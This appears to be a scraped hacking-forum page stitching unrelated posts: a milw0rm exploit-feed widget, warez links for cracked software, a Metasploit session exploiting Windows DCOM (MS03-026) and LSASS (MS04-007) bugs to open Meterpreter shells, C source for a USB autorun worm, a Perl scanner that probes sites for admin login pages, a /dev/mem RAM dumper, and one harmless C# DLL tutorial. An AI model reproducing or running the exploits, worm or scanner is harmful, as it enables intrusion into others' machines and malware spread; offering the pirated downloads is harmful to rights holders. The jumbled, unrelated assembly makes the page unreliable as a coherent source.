column2_hcolour_Module1 = '#D6EF39' // column2 highlight color, to highlight newly added milw0rm exploits (default:#D6EF39) var column2_ttheme_Module1 = '' // column2 header text theme (default:Arial Narrow) var column2_tsize_Module1 = '1' // column2 text size (default:0) // Functional settings var count_column_Module1 = '2' // column count, 1 or 2 (default:2) var count_Module1 = 10 // news count, 1 to 10 (default:10) var adjust_length_Module1 = 'no' // news length correction 'yes' or 'no' (default:yes) var adjust_var_Module1 = 55 // maximum characters count after what the correction is made (default:75) // **********************no modifications required after******************************* var b_Module1 = '..'; var htmltxt_Module1 = ""; var base_colour_Module1 = column2_tcolour_Module1; var font_header_Module1 = '+ header_tsize_Module1 + '" face="' + header_ttheme_Module1 + '" color="' + header_tcolour_Module1 + '">'; var font_column1_Module1 = '+ column1_tsize_Module1 + '" face="' + column1_ttheme_Module1 + '" color="' + column1_tcolour_Module1 + '">'; var font_column2_Module1 = '+ column2_tsize_Module1 + '" face="' + column2_ttheme_Module1 + '" color="' + column2_tcolour_Module1 + '">'; var milalerts1; function wait_Module1(millis_Module1) { var date_Module1 = new Date(); var curDate_Module1 = null; do { curDate_Module1 = new Date(); } while(curDate_Module1-date_Module1 < millis_Module1); } function error_Module1() { for (var lid_Module1=1,i_Module1=0;i_Module1<10;i_Module1++,lid_Module1++) { document.getElementById('link_Module1'+ lid_Module1).innerHTML= font_column2_Module1 + 'Timeout, refresh'; } return; } function refresh_Module1() { for (var lid_Module1=1,i_Module1=0;i_Module1<40;i_Module1+=4,lid_Module1++) { document.getElementById('link_Module1'+ lid_Module1).innerHTML= font_column2_Module1 + 'Refreshing...'; } update_Module1(); return; } function update_Module1() { wait_Module1(0); scriptTag_Module1 = document.getElementById('Script_Module1'); headID_Module1 = document.getElementsByTagName("head")[0]; if(scriptTag_Module1) {headID_Module1.removeChild(document.getElementById('Script_Module1'));} newScript_Module1 = document.createElement('script'); newScript_Module1.type = 'text/javascript'; newScript_Module1.src = feed_Module1 + "?" + Math.random(); //IE7 refresh patch to avoid caching newScript_Module1.id = 'Script_Module1'; newScript_Module1.defer = false; headID_Module1.appendChild(newScript_Module1); newScript_Module1.onreadystatechange=function() { if(newScript_Module1.readyState=="loaded"){ scriptLoaded_Module1(); return; } } newScript_Module1.onload=function() { scriptLoaded_Module1(); return; } if(newScript_Module1.readyState=="loaded") { //Opera patch scriptLoaded_Module1(); return; } return; } function scriptLoaded_Module1() { wait_Module1(100); if (milalerts1==null) { error_Module1(); return; } for (var lid_Module1=1,i_Module1=0;i_Module1<40;i_Module1+=4,lid_Module1++) { if (milalerts1[i_Module1+3]=='1'){ column2_tcolour_Module1 = column2_hcolour_Module1;font_column2_Module1 = '+ column2_tsize_Module1 + '" face="' + column2_ttheme_Module1 + '" color="' + column2_tcolour_Module1 + '">'; } if (adjust_length_Module1 == "yes") { var a_Module1 = milalerts1[i_Module1+1]; if (a_Module1.length > adjust_var_Module1) document.getElementById('link_Module1'+ lid_Module1).innerHTML='+ milalerts1[i_Module1+2] + '" target="_blank" style="text-decoration: none">' + font_column2_Module1 + a_Module1.substr(0,adjust_var_Module1) + b_Module1 + ''; else document.getElementById('link_Module1'+ lid_Module1).innerHTML='+ milalerts1[i_Module1+2] + '" target="_blank" style="text-decoration: none">' + font_column2_Module1 + milalerts1[i_Module1+1] + ''; } else document.getElementById('link_Module1'+ lid_Module1).innerHTML='+ milalerts1[i_Module1+2] + '" target="_blank" style="text-decoration: none">' + font_column2_Module1 + milalerts1[i_Module1+1] + ''; if (count_column_Module1 != "1") { document.getElementById('date_Module1'+ lid_Module1).innerHTML='' + font_column1_Module1 + milalerts1[i_Module1+0] + ''; } column2_tcolour_Module1 = base_colour_Module1; font_column2_Module1 = '+ column2_tsize_Module1 + '" face="' + column2_ttheme_Module1 + '" color="' + column2_tcolour_Module1 + '">'; } lid_Module1=1; i_Module1=0; return; } if (count_column_Module1 == "1") { colspan_Module1 = 1; } else { colspan_Module1 = 2; } if (count_Module1 > 0) { if (count_Module1 > 10) {count_Module1 = 10} htmltxt_Module1 += '\n+ table_align_Module1 + '" width="' + table_width_Module1 + '" cellspacing="' + table_cspacing_Module1 + '" cellpadding="' + table_cpadding_Module1 + '" border="' + table_border_Module1 + '" bordercolor="' + table_bdcolour_Module1 + '" bgcolor="' + table_bgcolour_Module1 + '" background="' + table_bgpic_Module1 + '" hspace="' + table_hspace_Module1 + '" vspace="' + table_vspace_Module1 + '" height="' + table_height_Module1 + '">'; htmltxt_Module1 += '\n"; } else { htmltxt_Module1 += 'Latest ' + count_Module1 + ' ' + header_title1_Module1 + "from milw0rm"; } for (var i_Module1=0, lid_Module1=1; i_Module1<count_Module1*4; i_Module1+=4, lid_Module1++) { if (count_column_Module1 == "1") { htmltxt_Module1 += '\n'; column1_tcolour_Module1 = base_colour_Module1; font_column1_Module1 = '+ column1_tsize_Module1 + '" face="' + column1_ttheme_Module1 + '" color="' + column1_tcolour_Module1 + '">'; } else { htmltxt_Module1 += '\n'; column2_tcolour_Module1 = base_colour_Module1; font_column2_Module1 = '+ column2_tsize_Module1 + '" face="' + column2_ttheme_Module1 + '" color="' + column2_tcolour_Module1 + '">'; } } } else { document.write("=== MILW0RM info feed error: Specify value of count > 0 ==="); } htmltxt_Module1 += '\n + header_align_Module1 + '" valign="' + header_valign_Module1 + '" height="' + header_height_Module1 + '" colspan="' + colspan_Module1 + '" bgcolor="' + header_bgcolour_Module1 + '">' + font_header_Module1 + '' + font_header_Module1 + '|about' + font_header_Module1 + 'refresh'; if (count_Module1 == 1) { htmltxt_Module1 += 'Latest ' + header_title2_Module1 + "from milw0rm + column2_align_Module1 + '" valign="' + column2_valign_Module1 + '" height="' + column2_height_Module1 + '" bgcolor="' + column2_bgcolour_Module1 + '"> + lid_Module1 + '">' + font_column2_Module1 + 'Updating... + column1_align_Module1 + '" valign="' + column1_valign_Module1 + '" height="' + column1_height_Module1 + '" bgcolor="' + column1_bgcolour_Module1 + '">' + font_column1_Module1 + ' +lid_Module1+'">' + lid_Module1 + ' + column2_align_Module1 + '" valign="' + column2_valign_Module1 + '" height="' + column2_height_Module1 + '" width="' + column2_width_Module1 + '" bgcolor="' + column2_bgcolour_Module1 + '"> + lid_Module1 + '">' + font_column2_Module1 + 'Updating... '; document.write(htmltxt_Module1); update_Module1(); by matthews

Here is what you receive with 20 SEO Secrets: 1. A 18 minute video showing you exactly how to use the tools with ease. 2. SEO Manifesto. This is a 12 minute audio rant about how easy search engine optimization is and how you can slap the search engines back! 3. A 55 page PDF with the 20 tools and explanations of how to use them properly. The 20th tool is a 30 page list of resources that will make your seo a breeze. 4. A copy of Ross’s SEO Diamond Ebook to make sure you understand everything you need to know about SEO! Download: http://hotfile.com/dl/7683043/bc3e1b2/20_SEO_Secrets.rar.html

this is an old exploit but still works i have test it on Local Area Network here this exploit tested on Windows XP Service Pack 1 [o] DCOM RPC Exploit (ms03_026_dcom) # Description This module exploits a stack overflow in the RPCSS service, this vulnerability was originally found by the Last Stage of Delirium research group and has bee widely exploited ever since. This module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request root@ubuntu:~# ping 172.16.1.31 PING 172.16.1.31 (172.16.1.31) 56(84) bytes of data. 64 bytes from 172.16.1.31: icmp_seq=1 ttl=128 time=2.09 ms 64 bytes from 172.16.1.31: icmp_seq=2 ttl=128 time=0.335 ms 64 bytes from 172.16.1.31: icmp_seq=3 ttl=128 time=0.342 ms ^C --- 172.16.1.31 ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 2005ms rtt min/avg/max/mdev = 0.335/0.922/2.091/0.826 ms root@ubuntu:~# nmap -O -PN 172.16.1.31 Starting Nmap 4.62 ( http://nmap.org ) at 2009-06-21 09:56 WIT Interesting ports on ******-******.kapukvalley.net (172.16.1.31): Not shown: 1710 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 5000/tcp open upnp MAC Address: 00:1C:F0:5A:98:AF (D-Link) Device type: general purpose Running: Microsoft Windows 2000 OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1 Network Distance: 1 hop OS detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1.860 seconds root@ubuntu:~# cd /home/noge/pentest/metasploit/ root@ubuntu:/home/noge/pentest/metasploit# ./msfconsole | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ msf v3.3-dev + -- --=[ 378 exploits - 234 payloads + -- --=[ 20 encoders - 7 nops =[ 154 aux msf > use windows/dcerpc/ms03_026_dcom msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms03_026_dcom) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 135 yes The target port Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LPORT 4444 yes The local port RHOST no The target address Exploit target: Id Name -- ---- 0 Windows NT SP3-6a/2000/XP/2003 Universal msf exploit(ms03_026_dcom) > set RHOST 172.16.1.31 RHOST => 172.16.1.31 msf exploit(ms03_026_dcom) > set TARGET 0 TARGET => 0 msf exploit(ms03_026_dcom) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 172.16.1.31 yes The target address RPORT 135 yes The target port Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LPORT 4444 yes The local port RHOST 172.16.1.31 no The target address Exploit target: Id Name -- ---- 0 Windows NT SP3-6a/2000/XP/2003 Universal msf exploit(ms03_026_dcom) > exploit [*] Started bind handler [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ... [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ... [*] Sending exploit ... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] The DCERPC service did not reply to our request [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (172.16.1.12:38423 -> 172.16.1.31:4444) meterpreter > pwd C:\WINDOWS\system32 meterpreter > sysinfo Computer: ******-****** OS : Windows XP (Build 2600, Service Pack 1). meterpreter > ============================================================================================= ============================================================================================= [o] KILLBILL SMB Exploit (ms04_007_killbill) # Description This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch. You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp payloads, however a few problems were encounted when using the equivalent bind payloads. Your mileage may vary. msf > use windows/smb/ms04_007_killbill msf exploit(ms04_007_killbill) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms04_007_killbill) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- PROTO smb yes Which protocol to use: http or smb RHOST yes The target address RPORT 445 yes Set the SMB service port Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LPORT 4444 yes The local port RHOST no The target address Exploit target: Id Name -- ---- 0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1 msf exploit(ms04_007_killbill) > set RHOST 172.16.1.31 RHOST => 172.16.1.31 msf exploit(ms04_007_killbill) > show targets Exploit targets: Id Name -- ---- 0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1 msf exploit(ms04_007_killbill) > set TARGET 0 TARGET => 0 msf exploit(ms04_007_killbill) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- PROTO smb yes Which protocol to use: http or smb RHOST 172.16.1.31 yes The target address RPORT 445 yes Set the SMB service port Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LPORT 4444 yes The local port RHOST 172.16.1.31 no The target address Exploit target: Id Name -- ---- 0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1 msf exploit(ms04_007_killbill) > exploit [*] Started bind handler [*] Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0) [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 3 opened (172.16.1.12:33484 -> 172.16.1.31:4444) meterpreter > sysinfo Computer: ******-****** OS : Windows XP (Build 2600, Service Pack 1). meterpreter > by matthews

Kaspersky Internet Security stops your PC being slowed down by cybercriminals and delivers unsurpassed on-line safety whilst protecting your files, music and photos from hackers : Keeps your money and identity safe Improved! Protects against bank account fraud Safeguards against online shopping threats Allows questionable applications and websites to be run in 'Safe Run Mode' New! Cybercriminals won’t hi-jack your PC Family protection from on-line predators Your files won’t be ruined by hackers Improved! Keeps your PC running smoothly Safer Wi-Fi connections Two way personal firewall Working keys till February 2010 Download: http://www.mediafire.com/download.php?edzmhto3juy

#include <windows.h> #include <stdio.h> int InfectDrives( ); int WriteINI( char* sINI, char* sFILE ); int ReadINI( char* sINI, char* sFILE ); int FileCopy( char* sNEW ); char* szFileName = "blah.exe"; int main() { int i = InfectDrives( ); printf( "drives infected: %i", i ); getchar( ); return 0; }; int InfectDrives( ) { char szBuffer[260]; char szInit[520], szFile[520]; int iCount = 0, iGet, iType; iGet = GetLogicalDriveStringsA( sizeof( szBuffer ), szBuffer ); if( iGet == 0 ) { return( 0 ); } char *szDrive = szBuffer; while( *szDrive ) { iType = GetDriveTypeA( szDrive ); sprintf( szInit, "%sautorun.inf", szDrive ); //craft inf sprintf( szFile, "%s%s", szDrive, szFileName ); //craft file if( iType == 2 ) //removable device { if( ReadINI( szInit, szFileName ) == 0 ) //check for infection { if( WriteINI( szInit, szFileName ) == 0 ) //infect { if( FileCopy( szFile ) == 0 ) //copy file { iCount++; } } } } szDrive = &szDrive[ strlen( szDrive ) + 1]; } return( iCount ); }; int WriteINI( char* sINI, char* sFILE ) { unsigned long bWrite = WritePrivateProfileString( "autorun", "open", sFILE, sINI ); if( bWrite == 0 ) { return( 1 ); } return( 0 ); }; int ReadINI( char* sINI, char* sFILE ) { char szBuffer[260]; unsigned long lRead = GetPrivateProfileString( "autorun", "open", NULL, szBuffer, sizeof( szBuffer ), sINI ); if( lRead != 0 ) { if( strstr( szBuffer, sFILE ) ) { return( 1 ); } } return( 0 ); }; int FileCopy( char* sNEW ) { char szBuffer[260]; GetModuleFileName( NULL, szBuffer, sizeof( szBuffer ) ); bool bCopy = CopyFile( szBuffer, sNEW, 0 ); if( bCopy == false ) { return( 1 ); } return( 0 ); }

#!/usr/bin/perl ## # By GlaDiaT0R # Admin Control Panel Finder ___ Version 1 # Home: Darkgh0st.com ## use HTTP::Request; use LWP::UserAgent; system('cls'); system('title Admin Control Panel Finder v1 final I[C]oded by Gladiator from H4ckCr3w.net'); print"\n"; print "-----------------------------------------------\n" ; print "[*]--Admin Control Panel Finder v 1 --------[*]\n" ; print "[*]-------------Coded By GlaDiaT0R----------[*]\n" ; print "[*]-------------From Darkgh0st.com---------[*]\n" ; print "[*]------------Greetz to Allah--------------[*]\n" ; print "*******************************************\n" ; print "\n"; print "~# enter site to scan\n* ex: www.domaine.com ou www.domaine.com/path\n-> "; $site=<STDIN>; chomp $site; print "\n"; print "~ Enter coding language of the website \n* ex: asp, php, cfm\n-> "; $code=<STDIN>; chomp($code); if ( $site !~ /^http:/ ) { $site = 'http://' . $site; } if ( $site !~ /\/$/ ) { $site = $site . '/'; } print "\n"; print "->Le site: $site\n"; print "->Source du site: $code\n"; print "->Scan de l'admin control panel en cours...\n\n\n"; if($code eq "asp"){ @path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp', 'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp', 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html', 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html', 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html', 'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp', 'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp', 'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html', 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html', 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp', 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp', 'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html', 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp', 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp', 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html' ); foreach $ways(@path1){ $final=$site.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; }else{ print "[-] Not Found <- $final\n"; } } } # ------------------------------------------------------- # -------------------test cfm ---------------------------| # ------------------------------------------------------- if($code eq "cfm"){ @path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm', 'admin_area/admin.cfm','admin_area/login.cfm','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm', 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html', 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html', 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html', 'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm', 'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm', 'moderator/admin.cfm','controlpanel.cfm','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.cfm','user.html','admincp/index.cfm','admincp/login.cfm','admincp/index.html', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html', 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html', 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm', 'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm', 'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.html', 'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm', 'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm', 'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html' ); foreach $ways(@path1){ $final=$site.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; }else{ print "[-] Not Found <- $final\n"; } } } # ------------------------------------------------------- #--------------------------/test-------------------------| # ------------------------------------------------------- if($code eq "php"){ @path2=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php', 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html', 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php', 'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php', 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php', 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html', 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html', 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html', 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php', 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php', 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php', 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php' ); foreach $ways(@path2){ $final=$site.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; }else{ print "[-] Not Found <- $final\n"; } } kill("STOP",NULL); } ## # By GlaDiaT0R ##

/* A simple tool that allows you to dump all the physical memory (RAM) */ /* For more visit: http://vx.netlux.org/wargamevx */ /* greetz: undernet @ #eof-project,#virus and to non3x for the testing */ /* Tested on: 2.6.20-1.2320.fc5smp i686 athlon 2.6.22-gentoo-r5 i686 AMD Turion(tm) 64 X2 Mobile Technology TL-50 */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <unistd.h> void Printable(char *str,int size) { int lm = 0; while(lm < size) { if(isprint(str[lm])) printf("%c",str[lm]); lm++; } } main(int argc,char *argv[]) { int fd,only_print; unsigned char *buf = NULL; unsigned int addr,page_size = sysconf(_SC_PAGESIZE),tot_mem = page_size*sysconf(_SC_PHYS_PAGES); if(argv[1] == NULL) { printf("DumpRam v0.1 by [WarGame/DoomRiderz]\n"); printf("Usage: %s [option]\n",argv[0]); printf("option can be:\n"); printf("-p = only printable chars\n"); printf("-e = every byte\n"); exit(EXIT_FAILURE); } if(getuid( != 0) { printf("You must be root\n"); exit(EXIT_FAILURE); } if(strcmp(argv[1],"-p") == 0) only_print = 1; else if(strcmp(argv[1],"-e") == 0) only_print = 0; else { printf("Invalid option\n"); exit(EXIT_FAILURE); } fd = open("/dev/mem",O_RDONLY); if(fd < 0) { perror("/dev/mem"); exit(EXIT_FAILURE); } printf("\n\n\n\t** RAM size in Kb: %d\n",tot_mem/1024); printf("\t** Size of a page in bytes: %d\n\n\n\n\n",page_size); if((buf = malloc(page_size)) == NULL) { perror("malloc()"); exit(EXIT_FAILURE); } while(read(fd,buf,page_size) != -1) { if(only_print) Printable(buf,page_size); else write(0,buf,page_size); } close(fd); free(buf); }

Creating and using DLL Files by sunjester Using DLL files is to eliminate writing code over and over again. DLL's are often used for may things like file I/O. I will show you how to take the first two tutorials I've written in this section (read and writing text files) and put them both in a DLL file. Then, once the DLL is in our project I will show you how to use the read and write methods we placed inside the DLL. It's probably more feasible for .NET applications to utilize DLL's instead of rewriting so much code. C# and VB .NET applications are mostly used ("in the industry") for demo applications, or test applications for rapid application development. yes, c#, and VB.net are RAD languages just like the old VB6. 1. first, create a new project. Open the wizard and select "Class Library" and give it an appropriate name 2. here you can copy & Paste the code from the previous two tutorials, below is what mine looks like now. //sunjester //fusecurity.com using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.IO; using System.Collections; namespace FileIO { public class InputOutput { //writing to text files public void writeToFile(string fileName, string content) { StreamWriter write = new StreamWriter(fileName); write.Write(content); write.Close(); } //reading from text files public ArrayList Read(string fileName) { StreamReader read = new StreamReader(fileName); ArrayList lines = new ArrayList(); while (!read.EndOfStream) { lines.Add(read.ReadLine()); } read.Close(); return lines; } } } 3. now we can build the DLL, so in the menu select "Build" then "Build Solution". 4. next, let's go ahead and add another project to this one just in case we need to go back to the original DLL source and update it. 5. name it accordingly. 6. now we add the reference to our DLL file we just created. 7. and the final code. using System; using System.Collections.Generic; using System.Linq; using System.Text; using FileIO; using System.Collections; namespace UseFileIO2 { class Program { static void Main(string[] args) { InputOutput io = new InputOutput(); io.writeToFile("c:\\test44.txt", "here is some sample test data to write"); ArrayList lines = io.Read("c:\\test44.txt"); for (int i = 0; i < lines.Count; i++) { Console.WriteLine(lines[i]); } } } }

Demo: http://linkvn.info/checker/ Download: http://www.2shared.com/file/7080989/60eb434b/Rapid_Account_Checker.html